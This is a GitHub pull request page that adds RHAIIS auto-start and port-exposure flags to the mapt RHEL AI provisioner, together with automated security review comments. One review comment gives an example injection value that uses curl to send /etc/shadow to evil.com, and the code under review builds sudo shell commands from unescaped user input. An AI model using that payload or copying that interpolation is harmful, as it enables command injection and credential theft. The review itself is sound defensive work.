feat(aws): add RHAIIS auto-start and expose-ports flags for RHEL AI provisioning#835
Merged
adrianriobo merged 3 commits intoJun 26, 2026
Merged
Conversation
📝 WalkthroughSummary by CodeRabbit
WalkthroughThis PR adds RHEL-AI provisioning parameters for model, HF token, API key, auto-start, and exposed ports, then threads them through the task template, CLI, API contract, and AWS deployment flow. ChangesRHEL-AI Configuration and Auto-Start
Estimated code review effort🎯 3 (Moderate) | ⏱️ ~25 minutes 🚥 Pre-merge checks | ✅ 3 | ❌ 2❌ Failed checks (2 warnings)
✅ Passed checks (3 passed)
Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out. Comment |
![coderabbitai[bot]](https://avatars.githubusercontent.com/in/347564?s=60&v=4){kind=small}
There was a problem hiding this comment.
Actionable comments posted: 2
🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
Inline comments:
In `@cmd/mapt/cmd/aws/hosts/rhelai.go`:
- Around line 66-69: The AutoStart field is being set with
viper.IsSet(params.RhelAIAutoStart), which only detects presence of the flag and
treats "--auto-start=false" as true; change the assignment to read the actual
boolean value using viper.GetBool(params.RhelAIAutoStart) so AutoStart reflects
explicit false values (update the struct initialization where AutoStart is set
and any related references to params.RhelAIAutoStart).
In `@pkg/provider/aws/action/rhel-ai/rhelai.go`:
- Around line 292-314: The rhaiisSetupScript function currently interpolates
user-controlled hfToken, model, and apiKey directly into shell commands,
creating a shell injection risk; update this by properly shell-escaping or
avoiding inline shell interpolation: sanitize/escape *r.hfToken, *r.model, and
*r.apiKey (e.g., use a shell-escaping helper such as
github.com/alessio/shellescape or go-shellquote) before inserting into the
sed/echo commands, or better yet write the values to a temporary file and use a
safe file-based systemd drop-in update instead of building complex command
strings; ensure the final command built by rhaiisSetupScript (and any usage with
NoLoggingCmdStd) only includes escaped literals or file references and not raw
user input.
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: Organization UI
Review profile: CHILL
Plan: Enterprise
Run ID: d388b731-9bb6-4ac0-9f46-58bcf2f476a8
📒 Files selected for processing (4)
cmd/mapt/cmd/aws/hosts/rhelai.gocmd/mapt/cmd/params/params.gopkg/provider/aws/action/rhel-ai/rhelai.gopkg/target/host/rhelai/api.go
Comment on lines
+292
to
+314
| func (r *rhelAIRequest) rhaiisSetupScript() string { | ||
| confDir := "/etc/containers/systemd/rhaiis.container.d" | ||
| script := fmt.Sprintf( | ||
| "sudo cp %s/install.conf.example %s/install.conf", | ||
| confDir, confDir) | ||
| if len(*r.hfToken) > 0 { | ||
| script += fmt.Sprintf( | ||
| " && sudo sed -i 's|HUGGING_FACE_HUB_TOKEN=.*|HUGGING_FACE_HUB_TOKEN=%s|' %s/install.conf", | ||
| *r.hfToken, confDir) | ||
| } | ||
| if len(*r.model) > 0 { | ||
| script += fmt.Sprintf( | ||
| ` && sudo sed -i 's|--model .*|--model %s \\|' %s/install.conf`, | ||
| *r.model, confDir) | ||
| } | ||
| if len(*r.apiKey) > 0 { | ||
| script += fmt.Sprintf( | ||
| " && sudo sed -i '/\\[Install\\]/i Environment=VLLM_API_KEY=%s' %s/install.conf", | ||
| *r.apiKey, confDir) | ||
| } | ||
| script += " && sudo systemctl daemon-reload && sudo systemctl start rhaiis" | ||
| return script | ||
| } |
There was a problem hiding this comment.
Shell injection vulnerability: sanitize user-controlled inputs before shell interpolation.
User-controlled values (hfToken, model, apiKey) are directly interpolated into shell commands without escaping. This creates a critical shell injection vulnerability. An attacker who controls these CLI parameters could inject arbitrary shell commands that execute with sudo privileges.
Example attack:
--hf-token='secret && curl evil.com/exfil?data=$(cat /etc/shadow)'This would produce:
sudo sed -i 's|HUGGING_FACE_HUB_TOKEN=.*|HUGGING_FACE_HUB_TOKEN=secret && curl evil.com/exfil?data=$(cat /etc/shadow)|' ...While NoLoggingCmdStd (line 250) prevents credential exposure in logs, it does not prevent shell injection.
🛡️ Recommended fix using shell escaping
Use shell quoting/escaping for all user-controlled interpolations. For bash, use printf %q or replace special characters:
func (r *rhelAIRequest) rhaiisSetupScript() string {
confDir := "/etc/containers/systemd/rhaiis.container.d"
script := fmt.Sprintf(
"sudo cp %s/install.conf.example %s/install.conf",
confDir, confDir)
if len(*r.hfToken) > 0 {
+ escapedToken := shellescape.Quote(*r.hfToken)
script += fmt.Sprintf(
- " && sudo sed -i 's|HUGGING_FACE_HUB_TOKEN=.*|HUGGING_FACE_HUB_TOKEN=%s|' %s/install.conf",
- *r.hfToken, confDir)
+ " && sudo sed -i \"s|HUGGING_FACE_HUB_TOKEN=.*|HUGGING_FACE_HUB_TOKEN=%s|\" %s/install.conf",
+ escapedToken, confDir)
}
if len(*r.model) > 0 {
+ escapedModel := shellescape.Quote(*r.model)
script += fmt.Sprintf(
- ` && sudo sed -i 's|--model .*|--model %s \\|' %s/install.conf`,
- *r.model, confDir)
+ " && sudo sed -i \"s|--model .*|--model %s \\\\|\" %s/install.conf",
+ escapedModel, confDir)
}
if len(*r.apiKey) > 0 {
+ escapedKey := shellescape.Quote(*r.apiKey)
script += fmt.Sprintf(
- " && sudo sed -i '/\\[Install\\]/i Environment=VLLM_API_KEY=%s' %s/install.conf",
- *r.apiKey, confDir)
+ " && sudo sed -i \"/\\\\[Install\\\\]/i Environment=VLLM_API_KEY=%s\" %s/install.conf",
+ escapedKey, confDir)
}
script += " && sudo systemctl daemon-reload && sudo systemctl start rhaiis"
return script
}Consider using a shell-escaping library like github.com/alessio/shellescape or github.com/kballard/go-shellquote.
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In `@pkg/provider/aws/action/rhel-ai/rhelai.go` around lines 292 - 314, The
rhaiisSetupScript function currently interpolates user-controlled hfToken,
model, and apiKey directly into shell commands, creating a shell injection risk;
update this by properly shell-escaping or avoiding inline shell interpolation:
sanitize/escape *r.hfToken, *r.model, and *r.apiKey (e.g., use a shell-escaping
helper such as github.com/alessio/shellescape or go-shellquote) before inserting
into the sed/echo commands, or better yet write the values to a temporary file
and use a safe file-based systemd drop-in update instead of building complex
command strings; ensure the final command built by rhaiisSetupScript (and any
usage with NoLoggingCmdStd) only includes escaped literals or file references
and not raw user input.
Add --auto-start, --model, --hf-token, and --api-key flags to `mapt aws rhel-ai create` to configure and start the RHAIIS inference server automatically after VM provisioning. When --auto-start is set, mapt SSHes into the provisioned VM after readiness, configures the RHAIIS quadlet with the provided model and credentials, and starts the systemd service. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
Add --expose-ports flag to RHEL AI create command to expose additional ports through the load balancer and security group. Update the Tekton task template with new params: auto-start, model, hf-token, api-key, and expose-ports. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
are-ces
force-pushed
the
rhelai-rhaiis-auto-start
branch
from
6cf7f4f to
8bb6a46
Compare
There was a problem hiding this comment.
Actionable comments posted: 3
🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
Inline comments:
In `@pkg/provider/aws/action/rhel-ai/rhelai.go`:
- Around line 227-228: CreateLoadBalancer in rhelai.go is still driven only by
SpotPrice, so non-spot expose-ports requests miss the load balancer path. Update
the logic where the deployment config is built (around CreateLoadBalancer,
ServiceEndpoints, and LBTargetGroups) so the load balancer is enabled whenever
exposePorts is requested, not just for spot allocation, and keep the
LBTargetGroups/service endpoint wiring consistent in both affected spots.
- Around line 329-335: The ingress rule creation in rhelai.go currently opens
every port in r.exposePorts to infra.NETWORKING_CIDR_ANY_IPV4, which can expose
unauthenticated inference endpoints. Update the logic in the loop around
r.exposePorts and securityGroup.IngressRules to require an API key before
allowing public exposure, or restrict access with a configurable source-CIDR
allowlist instead of 0.0.0.0/0. Ensure the RHEL AI provisioning path (including
autoStart and empty apiKey cases) blocks or narrows public access for these
ports.
- Around line 303-305: The `RunCommand` call in `rhelai.go` is still passing a
setup script string from `r.rhaiisSetupScript()` that interpolates `hfToken` or
`apiKey`, which can leave secrets in Pulumi state. Update the `RunCommand`/setup
flow so credentials are provided as Pulumi secret inputs (for example, mark the
credential-bearing arguments as secret) or injected through environment
variables instead of string interpolation. Make the change in the
`r.rhaiisSetupScript` path and the `RunCommand` invocation that uses it so no
secret values appear in the stored command text.
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: Organization UI
Review profile: CHILL
Plan: Enterprise
Run ID: 87896d18-8c8a-41ac-8514-e2ac3afff8ac
📒 Files selected for processing (5)
cmd/mapt/cmd/aws/hosts/rhelai.gocmd/mapt/cmd/params/params.gopkg/provider/aws/action/rhel-ai/rhelai.gopkg/target/host/rhelai/api.gotkn/template/infra-aws-rhel-ai.yaml
🚧 Files skipped from review as they are similar to previous changes (3)
- cmd/mapt/cmd/params/params.go
- pkg/target/host/rhelai/api.go
- cmd/mapt/cmd/aws/hosts/rhelai.go
There was a problem hiding this comment.
Caution
Inline review comments failed to post. This is likely due to GitHub's internal server error or limits when posting large numbers of comments. If you are seeing this consistently it is likely a permissions issue. Please check "Moderation" -> "Code review limits" under your organization settings.
Actionable comments posted: 3
🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
Inline comments:
In `@pkg/provider/aws/action/rhel-ai/rhelai.go`:
- Around line 227-228: CreateLoadBalancer in rhelai.go is still driven only by
SpotPrice, so non-spot expose-ports requests miss the load balancer path. Update
the logic where the deployment config is built (around CreateLoadBalancer,
ServiceEndpoints, and LBTargetGroups) so the load balancer is enabled whenever
exposePorts is requested, not just for spot allocation, and keep the
LBTargetGroups/service endpoint wiring consistent in both affected spots.
- Around line 329-335: The ingress rule creation in rhelai.go currently opens
every port in r.exposePorts to infra.NETWORKING_CIDR_ANY_IPV4, which can expose
unauthenticated inference endpoints. Update the logic in the loop around
r.exposePorts and securityGroup.IngressRules to require an API key before
allowing public exposure, or restrict access with a configurable source-CIDR
allowlist instead of 0.0.0.0/0. Ensure the RHEL AI provisioning path (including
autoStart and empty apiKey cases) blocks or narrows public access for these
ports.
- Around line 303-305: The `RunCommand` call in `rhelai.go` is still passing a
setup script string from `r.rhaiisSetupScript()` that interpolates `hfToken` or
`apiKey`, which can leave secrets in Pulumi state. Update the `RunCommand`/setup
flow so credentials are provided as Pulumi secret inputs (for example, mark the
credential-bearing arguments as secret) or injected through environment
variables instead of string interpolation. Make the change in the
`r.rhaiisSetupScript` path and the `RunCommand` invocation that uses it so no
secret values appear in the stored command text.
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: Organization UI
Review profile: CHILL
Plan: Enterprise
Run ID: 87896d18-8c8a-41ac-8514-e2ac3afff8ac
📒 Files selected for processing (5)
cmd/mapt/cmd/aws/hosts/rhelai.gocmd/mapt/cmd/params/params.gopkg/provider/aws/action/rhel-ai/rhelai.gopkg/target/host/rhelai/api.gotkn/template/infra-aws-rhel-ai.yaml
🚧 Files skipped from review as they are similar to previous changes (3)
- cmd/mapt/cmd/params/params.go
- pkg/target/host/rhelai/api.go
- cmd/mapt/cmd/aws/hosts/rhelai.go
🛑 Comments failed to post (3)
pkg/provider/aws/action/rhel-ai/rhelai.go (3)
227-228: 🎯 Functional Correctness | 🟠 Major | ⚡ Quick win
Create the load balancer when ports are exposed.
LBTargetGroupsnow includesexposePorts, butCreateLoadBalanceris still only tied to spot allocation. Non-spot--expose-portsrequests won’t get the advertised load-balancer path.Proposed fix
- CreateLoadBalancer: r.allocationData.SpotPrice != nil, + CreateLoadBalancer: r.allocationData.SpotPrice != nil || len(r.exposePorts) > 0,Also applies to: 263-265
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the rest with a brief reason, keep changes minimal, and validate. In `@pkg/provider/aws/action/rhel-ai/rhelai.go` around lines 227 - 228, CreateLoadBalancer in rhelai.go is still driven only by SpotPrice, so non-spot expose-ports requests miss the load balancer path. Update the logic where the deployment config is built (around CreateLoadBalancer, ServiceEndpoints, and LBTargetGroups) so the load balancer is enabled whenever exposePorts is requested, not just for spot allocation, and keep the LBTargetGroups/service endpoint wiring consistent in both affected spots.
303-305: 🔒 Security & Privacy | 🟠 Major
🧩 Analysis chain
🏁 Script executed:
#!/bin/bash # Verify whether secret-bearing remote commands are stored as plain Pulumi command args. sed -n '300,340p' pkg/provider/aws/modules/ec2/compute/compute.go sed -n '361,383p' pkg/provider/aws/action/rhel-ai/rhelai.goRepository: redhat-developer/mapt
Length of output: 1994
Avoid embedding credentials in Pulumi command strings
NoLoggingCmdStdsuppresses the execution output, but it does not encrypt the command arguments stored in the Pulumi state. Becauser.rhaiisSetupScript()embedshfTokenorapiKeydirectly into the string passed toRunCommand, these secrets risk being persisted in plain text within the state file.Refactor to:
- Use Pulumi Secret inputs and explicitly mark credential arguments as
Secret(true), or- Inject credentials via environment variables/ECS/ESC rather than string interpolation.
This applies to
pkg/provider/aws/action/rhel-ai/rhelai.golines 303–305 and 366–379.🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the rest with a brief reason, keep changes minimal, and validate. In `@pkg/provider/aws/action/rhel-ai/rhelai.go` around lines 303 - 305, The `RunCommand` call in `rhelai.go` is still passing a setup script string from `r.rhaiisSetupScript()` that interpolates `hfToken` or `apiKey`, which can leave secrets in Pulumi state. Update the `RunCommand`/setup flow so credentials are provided as Pulumi secret inputs (for example, mark the credential-bearing arguments as secret) or injected through environment variables instead of string interpolation. Make the change in the `r.rhaiisSetupScript` path and the `RunCommand` invocation that uses it so no secret values appear in the stored command text.
329-335: 🔒 Security & Privacy | 🟠 Major | ⚡ Quick win
Do not expose inference ports publicly without an auth requirement.
Every
exposePortsentry opens0.0.0.0/0; withautoStartenabled and an emptyapiKey, this can publish vLLM unauthenticated. Require an API key for exposed RHAIIS ports or add a source-CIDR allowlist.🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the rest with a brief reason, keep changes minimal, and validate. In `@pkg/provider/aws/action/rhel-ai/rhelai.go` around lines 329 - 335, The ingress rule creation in rhelai.go currently opens every port in r.exposePorts to infra.NETWORKING_CIDR_ANY_IPV4, which can expose unauthenticated inference endpoints. Update the logic in the loop around r.exposePorts and securityGroup.IngressRules to require an API key before allowing public exposure, or restrict access with a configurable source-CIDR allowlist instead of 0.0.0.0/0. Ensure the RHEL AI provisioning path (including autoStart and empty apiKey cases) blocks or narrows public access for these ports.
are-ces
changed the title
Run make tkn-update to regenerate tkn/*.yaml from templates. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
There was a problem hiding this comment.
Actionable comments posted: 3
🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
Inline comments:
In `@tkn/infra-aws-rhel-ai.yaml`:
- Around line 149-154: Remove the hf-token and api-key Task parameters from the
Tekton task definition and update the related task steps to read both values
from a Secret mount or env source instead, matching the existing AWS and RH
credential pattern. Check the task spec where these params are declared and
wherever the task uses them, then replace param references with secret-backed
env/volume references so credentials are never stored in TaskRun/PipelineRun
specs.
- Around line 311-316: The shell snippet that builds cmd is leaking credentials
because xtrace is enabled earlier, so the direct expansion of $(params.hf-token)
and $(params.api-key) will be printed to logs. Update the secret handling in
this task script so the values are assigned or consumed in a way that avoids
traced expansion, and keep the relevant logic around cmd construction while
masking or temporarily disabling tracing in the section that references these
parameters.
- Around line 308-318: The command construction in the parameter handling block
is unsafe because `model`, `hf-token`, `api-key`, and `expose-ports` are
appended into a shell string that is later passed through `eval`. Update the
logic around the `cmd` assembly so these inputs are not concatenated into quoted
shell fragments; instead, build an argument list/array and execute it directly
from the same task script. Keep the fix localized to the branch that appends
these params and the later `eval "${cmd}"` execution path.
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: Organization UI
Review profile: CHILL
Plan: Enterprise
Run ID: 20ce252f-8db7-420b-bab7-f5dd28934f46
📒 Files selected for processing (1)
tkn/infra-aws-rhel-ai.yaml
Comment on lines
+149
to
+154
| - name: hf-token | ||
| description: HuggingFace Hub token for model download. Read from secret if not set directly. | ||
| default: "" | ||
| - name: api-key | ||
| description: API key to enforce secure connections to vLLM. | ||
| default: "" |
There was a problem hiding this comment.
🔒 Security & Privacy | 🟠 Major | 🏗️ Heavy lift
Do not carry hf-token and api-key as Task params.
Tekton persists param values in the TaskRun/PipelineRun spec, so these credentials stay readable via the Kubernetes API even if later command output is suppressed. These should be sourced from a Secret mount/env, like the existing AWS and RH credentials.
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In `@tkn/infra-aws-rhel-ai.yaml` around lines 149 - 154, Remove the hf-token and
api-key Task parameters from the Tekton task definition and update the related
task steps to read both values from a Secret mount or env source instead,
matching the existing AWS and RH credential pattern. Check the task spec where
these params are declared and wherever the task uses them, then replace param
references with secret-backed env/volume references so credentials are never
stored in TaskRun/PipelineRun specs.
Comment on lines
+308
to
+318
| if [[ "$(params.model)" != "" ]]; then | ||
| cmd+="--model '$(params.model)' " | ||
| fi | ||
| if [[ "$(params.hf-token)" != "" ]]; then | ||
| cmd+="--hf-token '$(params.hf-token)' " | ||
| fi | ||
| if [[ "$(params.api-key)" != "" ]]; then | ||
| cmd+="--api-key '$(params.api-key)' " | ||
| fi | ||
| if [[ "$(params.expose-ports)" != "" ]]; then | ||
| cmd+="--expose-ports '$(params.expose-ports)' " |
There was a problem hiding this comment.
🔒 Security & Privacy | 🔴 Critical | ⚡ Quick win
Avoid sending these params through eval.
These values are concatenated into cmd and later executed with eval "${cmd}". A single quote in model, hf-token, api-key, or expose-ports breaks the quoting and becomes shell injection inside a container that already has AWS credentials mounted. Build an argv list instead of a shell string.
Suggested direction
- cmd="mapt aws rhel-ai $(params.operation) "
+ set -- mapt aws rhel-ai "$(params.operation)"
...
- if [[ "$(params.model)" != "" ]]; then
- cmd+="--model '$(params.model)' "
- fi
+ if [[ "$(params.model)" != "" ]]; then
+ set -- "$@" --model "$(params.model)"
+ fi
...
- eval "${cmd}"
+ "$@"📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
Suggested change
| if [[ "$(params.model)" != "" ]]; then | |
| cmd+="--model '$(params.model)' " | |
| fi | |
| if [[ "$(params.hf-token)" != "" ]]; then | |
| cmd+="--hf-token '$(params.hf-token)' " | |
| fi | |
| if [[ "$(params.api-key)" != "" ]]; then | |
| cmd+="--api-key '$(params.api-key)' " | |
| fi | |
| if [[ "$(params.expose-ports)" != "" ]]; then | |
| cmd+="--expose-ports '$(params.expose-ports)' " | |
| if [[ "$(params.model)" != "" ]]; then | |
| set -- "$@" --model "$(params.model)" | |
| fi | |
| if [[ "$(params.hf-token)" != "" ]]; then | |
| set -- "$@" --hf-token "$(params.hf-token)" | |
| fi | |
| if [[ "$(params.api-key)" != "" ]]; then | |
| set -- "$@" --api-key "$(params.api-key)" | |
| fi | |
| if [[ "$(params.expose-ports)" != "" ]]; then | |
| set -- "$@" --expose-ports "$(params.expose-ports)" |
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In `@tkn/infra-aws-rhel-ai.yaml` around lines 308 - 318, The command construction
in the parameter handling block is unsafe because `model`, `hf-token`,
`api-key`, and `expose-ports` are appended into a shell string that is later
passed through `eval`. Update the logic around the `cmd` assembly so these
inputs are not concatenated into quoted shell fragments; instead, build an
argument list/array and execute it directly from the same task script. Keep the
fix localized to the branch that appends these params and the later `eval
"${cmd}"` execution path.
Comment on lines
+311
to
+316
| if [[ "$(params.hf-token)" != "" ]]; then | ||
| cmd+="--hf-token '$(params.hf-token)' " | ||
| fi | ||
| if [[ "$(params.api-key)" != "" ]]; then | ||
| cmd+="--api-key '$(params.api-key)' " | ||
| fi |
There was a problem hiding this comment.
🔒 Security & Privacy | 🟠 Major | ⚡ Quick win
debug=true will print the new secrets to logs.
Line 253 enables xtrace, and these assignments expand $(params.hf-token) and $(params.api-key) directly in traced shell output. That leaks both credentials verbatim during task execution.
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In `@tkn/infra-aws-rhel-ai.yaml` around lines 311 - 316, The shell snippet that
builds cmd is leaking credentials because xtrace is enabled earlier, so the
direct expansion of $(params.hf-token) and $(params.api-key) will be printed to
logs. Update the secret handling in this task script so the values are assigned
or consumed in a way that avoids traced expansion, and keep the relevant logic
around cmd construction while masking or temporarily disabling tracing in the
section that references these parameters.
adrianriobo
approved these changes
Jun 26, 2026
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
2 participants
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
Add
--auto-start,--model,--hf-token,--api-key, and--expose-portsflags tomapt aws rhel-ai createto configure and start the RHAIIS inference server automatically after VM provisioning, and expose additional ports through the load balancer and security group.Closes #759
Auto-start flags
After
mapt aws rhel-ai createprovisions a VM, the RHEL AI image ships with RHAIIS (vLLM inference server) pre-installed as a systemd quadlet but inactive. Users currently must SSH in manually to configure and start it. These flags automate that post-provisioning step.When
--auto-startis set, mapt SSHes into the provisioned VM after readiness, configures the RHAIIS quadlet with the provided model and credentials, and starts the systemd service. Sensitive output (HF token) is suppressed from logs usingNoLoggingCmdStd. Without--auto-start, behavior is unchanged.Expose ports
--expose-portsaccepts a comma-separated list of ports (e.g.8000,8080) to expose through the AWS load balancer target groups and security group ingress rules. By default only port 22 (SSH) is exposed. This enables external access to services like vLLM (port 8000) without requiring SSH tunneling.Tekton task template
Updated
tkn/template/infra-aws-rhel-ai.yamlwith all new params:auto-start,model,hf-token,api-key, andexpose-ports.Usage:
mapt aws rhel-ai create \ --project-name test \ --backed-url "file:///tmp/test" \ --version 3.4.0-ea.1 \ --spot \ --auto-start \ --model meta-llama/Llama-3.2-1B-Instruct \ --hf-token $HF_TOKEN \ --api-key $API_KEY \ --expose-ports 8000Validated end-to-end: provisioned RHEL AI VM with
--auto-startand--expose-ports 8000, confirmedsystemctl status rhaiisactive,curl <host>:8000/v1/modelsreturns the model externally, and chat completions respond successfully.Co-Authored-By: Claude Opus 4.6 (1M context) noreply@anthropic.com